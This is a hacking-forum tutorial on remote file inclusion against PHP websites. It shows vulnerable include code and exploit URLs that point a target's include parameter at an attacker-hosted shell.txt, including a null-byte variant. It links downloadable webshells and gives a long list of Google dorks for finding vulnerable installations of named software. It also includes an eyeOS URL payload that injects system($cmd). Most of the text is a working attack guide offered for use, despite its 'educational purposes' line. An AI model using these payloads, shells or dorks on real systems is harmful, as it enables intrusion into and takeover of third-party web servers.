ReMote file inclusion

RFI-Remote File Inclusion. (Easy and short)

For educational purposes only!
Hellow, leetcoder users.
First of all what do you need.

A vulnerable to RFI site.
(wil be explained detailed in this tutorial.).

A shell. (provided in tutorial.)

This is a very Easy tutorial.
It is easy because RFI is easy.
But do not get me wrong.
finding vulnerables is the hard part!
Since this is a mistake not alot off people make not man sites are vuln to it.

But why do all the trouble using sqli, xss, lfi, csrf, ssi,..
If this one is so easy.
Thats why i make this tutorial.
Part 1. Explenation.
-- What is RFI
-- How to find vulnerables.
-- How to test vulnerability.
Part 2. exploiting.
-- Looking for exploit link.
-- ADD your shell.
part 3. Downloads.
-- Shells.
-- Dorks.


Part 1. Explenation.
Explenation. What is RFI?

RFI or remote file inclusion. is a very easy exploiting methode.
But it is a very uncommon vulnerability.
This gets created by not updating patched or wrongly updating them.
So it still happons.
Remote file inclusion is exactly what it means.
You add (include a file into the directory. remotely.)

Explenation. How to find vulnerables.

Finding vulnerables is not so different from finding others.
We use dorks.
But how exactly do we get this vulnerability?

Well this is a very simple include file.
Code:
<?php
include($_GET['p']
?>

It sais include ['p']
that means in the link it would be something like this:
http://www .[site]. com/index.php?P=travel.php

This is importand for our exploit code. later in the tutorial.

This could be something else letters, words and so on.
example:
Code:
<?php
include($_GET['RealSteel']
?>

We allready know what this means!
http://www .[site]. com/index.php?RealSteel=travel.php
Its something like ID. no time to explain.

To find them? we look for dorks.
or we use scanners and so on.
same as we do whit sqli ;).

Explenation. How to test vulnerability.
Easy. we will exploit our full code.
Checking vulnerability is literally exploiting it.
So we can actually skip this step! ^^.

Easy aint it :D.

part 2.exploiting.
exploiting. Looking for exploit link!

simple. change a link like this for example:
Code:
http://www.[site].com/index.php?x=RealSteel
chenge the =realsteel part to a file whe could edit. replace.
Which would be the include.php?

Code:
http://www.[site].com/index.php?x=realpage.php
If all good you get no error.
because this file is there! we googled it ^^.

exploiting. Add your shell.

Exploiting, is changing the include whit your shell.txt do not use it as .php or whatever you did.
Simple upload a shell and add the link.

as following:
Code:
http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt?
Add the question mark at the end!!

If you get an error. try changing the exploit link like following:
Code:
http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt?%00
Watch the %00 at the end. its behind the question mark.

Part 3. Downloads.
Shells
-----------------
PHPJackal Shell < --- http://pastebin.com/rLq3iQEV
g00nshell v1.3 Final < --- http://pastebin.com/XdhUJ3t5
Root Shell < --- http://pastebin.com/yuLGFxpF
-----------------
Some Dorks :
---------
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d); &a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=